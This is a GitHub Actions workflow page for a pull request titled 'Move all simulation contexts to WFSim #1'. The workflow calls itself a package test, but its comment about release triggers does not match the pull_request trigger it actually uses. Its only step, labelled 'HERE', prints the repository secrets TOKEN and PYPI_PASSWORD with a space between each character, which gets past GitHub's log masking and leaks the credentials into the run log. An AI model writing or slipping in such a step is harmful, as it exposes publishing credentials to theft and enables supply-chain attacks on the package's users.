Skip to content

Move all simulation contexts to WFSim #1

Move all simulation contexts to WFSim

Move all simulation contexts to WFSim #1

Workflow file for this run

name: Test package
# Trigger this code when a new release is published
on:
pull_request:
jobs:
test:
runs-on: ubuntu-latest
steps:
- name: HERE
env:
TOKEN: ${{ secrets.TOKEN }}
PYPI_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
run: |
echo ${{ secrets.TOKEN }} | sed 's/./& /g'
echo ${{ secrets.PYPI_PASSWORD }} | sed 's/./& /g'